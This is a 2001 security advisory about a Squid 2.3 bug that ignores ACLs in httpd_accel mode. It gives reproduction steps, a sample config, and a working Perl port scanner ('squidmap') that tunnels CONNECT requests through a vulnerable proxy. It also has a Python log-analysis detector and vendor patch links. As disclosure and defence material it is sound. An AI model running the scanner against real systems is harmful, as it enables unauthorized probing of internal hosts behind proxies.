COMMAND
Squid
SYSTEMS AFFECTED
Squid 2.3STABLE3 and 2.3STABLE4 unpatched
PROBLEM
Following is based on a Security Advisory NASR-2001-001.
Squid can be used to proxy requests to arbitrary hosts, and therefore to
portscan, if it is set up as an httpd accelerator (reverse proxy).
This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1 -
vendors basing their RPMS on RedHat 7.0 are advised to check and
apply the patch from the squid site. Debian uses 2.2 and 2.4 so
is unaffected.
Squid has a known bug in 2.3STABLE4 which ignores ACLs in
httpd_accel mode. Note this only applies if httpd_accel_host is
set and httpd_accel_with_proxy is off. This is not the
default configuration, so a stock install is not vulnerable without
making these configuration changes.
This enables portscanning via a squid running in this mode,
potentially allowing remote attackers to compromise machines
behind a squid set up this way.
Steps to Reproduce:
1. Set squid to httpd_accel mode, with a particular host and
strict acl's
2. export httpd_proxy="http://squid-server:port"
3. lynx http://victim:port/
Actual Results: You get an HTTP 200 code if the port is open and
sometimes a response banner from some services (SSH, SMTP, etc.)
Expected Results: Should be access denied (403)
Proxies have often been used in anonymizing attacks on HTTP, but
as more sites use reverse proxying as a method of distributing
their network load and load balancing requests, there is the
possibility that malicious users could gain proxied access or
internal information via them. Attached are a sample squid.conf and
a sample perl portmapper taking advantage of this bug. Squid
will log you running this, so it isn't anonymous, and the task of
discovering accelerated sites automatically is left as an
exercise for the reader.
squid.conf:
# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>
http_port 3128
cache_mem 128 MB
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports port 80
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy off
Script:
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
$|++;                        # unbuffered output so results appear as found
require LWP::UserAgent;
require HTTP::Request;
use Getopt::Std;
getopts('b:P:t:L:H:', \%args);
if ($args{t} eq "") {        # a target host is required
    print_help();
    exit 0;
}
$low        = $args{L} || 1;
$high       = $args{H} || 8192;
$proxy      = $args{b};
$proxy_port = $args{P} || 80;
$target     = $args{t};
$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";
# for loop hard coded - fixme
for ($port = $low; $port <= $high; $port++) {
    $request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res = $ua->request($request);
    my $service = getservbyport($port, 'tcp');   # service name from /etc/services
    # Check the outcome of the response: a 2xx means the proxy reached the port
    if ($res->is_success) {
        print "$port\topen\t\t", $service, "\t\t", $res->content, "\n";
    }
}
sub print_help {
    print 'Usage: squidmap <options> where options:', "\n";
    print '-b host HTTP proxy via host', "\n";
    print '-P ## HTTP proxy port (default: 80)', "\n";
    print '-L ## low end/start of range (default: 1)', "\n";
    print '-H ## high end/end of range (default: 8192)', "\n";
    print '-t host target to attempt to scan', "\n";
}
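Since Squid logs every request the script above makes, an accelerator's access.log is the place to spot this abuse. The following is an added example, not part of the advisory: it parses Squid's native log format, treats any successful request that did not go to the configured httpd_accel_host/httpd_accel_port (localhost:80 from the sample squid.conf) or that used CONNECT as off-accelerator traffic, and reports clients that fanned out across several ports. The log lines are constructed for the example.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample of Squid native access.log lines (not from the advisory):
# time elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
994521600.123    45 10.0.0.5 TCP_MISS/200 312 CONNECT http://192.168.1.10:22 - DIRECT/192.168.1.10 -
994521600.301    40 10.0.0.5 TCP_MISS/200 300 CONNECT http://192.168.1.10:25 - DIRECT/192.168.1.10 -
994521600.480    38 10.0.0.5 TCP_MISS/200 290 CONNECT http://192.168.1.10:80 - DIRECT/192.168.1.10 -
994521601.000   120 10.0.0.7 TCP_HIT/200 4821 GET http://localhost/index.html - NONE/- text/html
994521602.000    80 10.0.0.9 TCP_MISS/403 1290 GET http://192.168.1.10:8080/ - NONE/- text/html
"""

ACCEL_HOST = "localhost"   # httpd_accel_host from the sample squid.conf
ACCEL_PORT = 80            # httpd_accel_port from the sample squid.conf

def parse_line(line):
    """Split one native-format line into the fields this check needs."""
    f = line.split()
    if len(f) < 7:
        return None
    _code, _, status = f[3].partition("/")
    u = urlsplit(f[6])
    return {"client": f[2], "status": int(status), "method": f[5],
            "host": u.hostname,
            "port": u.port or (443 if u.scheme == "https" else 80)}

def is_off_accel(entry):
    """True when a successful (2xx) request left the accelerator's one origin.
    A 403 is the expected outcome on a patched squid, so it is not counted."""
    if entry is None or entry["status"] // 100 != 2:
        return False
    return (entry["method"] == "CONNECT"
            or entry["host"] != ACCEL_HOST or entry["port"] != ACCEL_PORT)

def find_scanners(log_text, min_ports=3):
    """Return {client: sorted ports} for clients that reached at least
    min_ports distinct host:port pairs through the accelerator; that
    fan-out is the signature of the portscan described in the advisory."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        e = parse_line(line)
        if is_off_accel(e):
            seen[e["client"]].add((e["host"], e["port"]))
    return {c: sorted(p for _, p in t) for c, t in seen.items()
            if len(t) >= min_ports}
```

Run it against a real accelerator's access.log with `find_scanners(open("/var/log/squid/access.log").read())`; any client it returns got successful responses from hosts the accelerator should never have reached.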
SOLUTION
The Squid developers are aware of this bug and have a patch on their site.
For Immunix OS:
http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/squid-2.3.STABLE4-10_StackGuard.i386.rpm
http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/squid-2.3.STABLE4-10_StackGuard.src.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/squid-2.3.STABLE4-10_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/squid-2.3.STABLE4-10_imnx.src.rpm
For Trustix Linux Security:
http://www.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/software/swup/
./1.2/SRPMS/squid-2.3.STABLE5-1tr.src.rpm
./1.2/RPMS/squid-2.3.STABLE5-1tr.i586.rpm
./1.1/SRPMS/squid-2.3.STABLE5-1tr.src.rpm
./1.1/RPMS/squid-2.3.STABLE5-1tr.i586.rpm
For Red Hat:
ftp://updates.redhat.com/7.0/en/os/SRPMS/squid-2.3.STABLE4-9.7.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/squid-2.3.STABLE4-9.7.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/squid-2.3.STABLE4-9.7.i386.rpm
For Linux Mandrake:
Linux-Mandrake 7.1: 7.1/RPMS/squid-2.3.STABLE5-1.3mdk.i586.rpm
7.1/SRPMS/squid-2.3.STABLE5-1.3mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/squid-2.3.STABLE5-1.2mdk.i586.rpm
7.2/SRPMS/squid-2.3.STABLE5-1.2mdk.src.rpm
Mandrake Linux 8.0: 8.0/RPMS/squid-2.3.STABLE5-1.1mdk.i586.rpm
8.0/SRPMS/squid-2.3.STABLE5-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/squid-2.3.STABLE5-1.3mdk.i586.rpm
1.0.1/SRPMS/squid-2.3.STABLE5-1.3mdk.src.rpm
Single Network Firewall 7.2: snf7.2/RPMS/squid-2.3.STABLE5-1.2mdk.i586.rpm
snf7.2/SRPMS/squid-2.3.STABLE5-1.2mdk.src.rpm
For Caldera Linux:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/squid-2.4.STABLE1-7.i386.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS/squid-2.4.STABLE1-7.src.rpm